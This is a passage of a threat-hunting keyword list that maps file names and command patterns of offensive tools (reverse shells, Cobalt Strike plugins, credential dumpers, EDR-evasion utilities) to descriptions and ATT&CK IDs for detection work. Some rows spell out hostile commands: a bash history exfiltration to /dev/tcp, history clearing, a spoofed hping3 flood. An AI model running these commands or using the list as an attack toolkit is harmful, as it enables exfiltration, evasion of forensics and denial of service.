+"*HijackHunter.exe*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*hijackProgDirMissingDll*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*HInvokeHashGen.cs*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*hipncndjamdcmphkgngojegjblibadbe*","greyware_tool_keyword","RusVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*history -a* tail -n1 ~/.bash_history > /dev/tcp/*/*","greyware_tool_keyword","bash keylogger","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*history -c*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*history -d -2 && history -d -1*","greyware_tool_keyword","history","Removes the most recently logged command.","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*history_cmd","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*HiveJack-Console.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*hktalent/scan4all*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*HKTL*","signature_keyword","Antivirus Signature","Antivirus signature_keyword for hacktool","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","hacktool signatures","N/A","N/A","N/A","N/A","N/A","N/A" +"*HKTL_NETCAT*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*hlldz/dazzleUP*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*hlldz/Phant0m*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*hlldz/RefleXXion*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" +"*hnmpcagpplmpfojmgmnngilcnanddlhb*","greyware_tool_keyword","Windscribe","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*hoangprod/AndrewSpecial*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" +"*hoapmlpnmpaehilehggglehfdlnoegck*","greyware_tool_keyword","Tunnello VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*hoaxshell.py*","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1203 - T1133 - T1190","TA0001 - TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2655","443","2023-06-18T13:26:32Z","2022-07-10T15:36:24Z" +"*holehe *@gmail.com*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*holehe.core:main*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*holehe\holehe*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*holehe-master.*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*hollow *.exe *.bin*","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","0","N/A","10","10","235","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" +"*hollower.Hollow(*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*home/kali/Downloads*","offensive_tool_keyword","kali","Kali Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Honey hash*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","New-HoneyHash.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*hookedbrowsers.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*hook-infection_monkey.exploit.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*hook-infection_monkey.network.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*hook-infection_monkey.post_breach.actions.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*hook-infection_monkey.post_breach.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*hook-infection_monkey.ransomware.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*hook-infection_monkey.system_info.collectors.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*hook-lsassy.py*","offensive_tool_keyword","crackmapexec","hook script for lsassy from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*hook-lsassy.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*hook-lsassy.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*hook-lsassy.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*hook-pypsrp.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*hook-pypykatz.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*HOST/EXEGOL-01.*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Host: FUZZ.machine.org*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*HostEnum.ps1*","offensive_tool_keyword","red-team-scripts","script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. it can also perform limited domain enumeration with the -Domain switch","T1016 - T1087.001 - T1049 - T1069","TA0007 - TA0003 - TA0006","N/A","N/A","Discovery","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" +"*HostExploiter.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*HostingCLR_inject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*HostingCLRx64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*houqingv1.0.zip*","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","10","10","205","59","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" +"*hpe_sim_76_amf_deserialization*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*hping2.h*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. hping3 can handle fragmentation","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" +"*hping3 -*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" +"*hping3 * --flood --frag --spoof * --destport*","offensive_tool_keyword","hping3","HPING3 DoS","T1498 - T1095 - T1045","TA0040 - TA0001 - TA0043","N/A","N/A","DOS","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*HRShell*client.py*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*HRShell*server.py*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*hta_evasion.hta*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*HtaPowershellGenerator.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*hta-to-javascript-crypter*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*HtaVBSGenerator.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*htdigest2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*html/js/beacons.js*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python 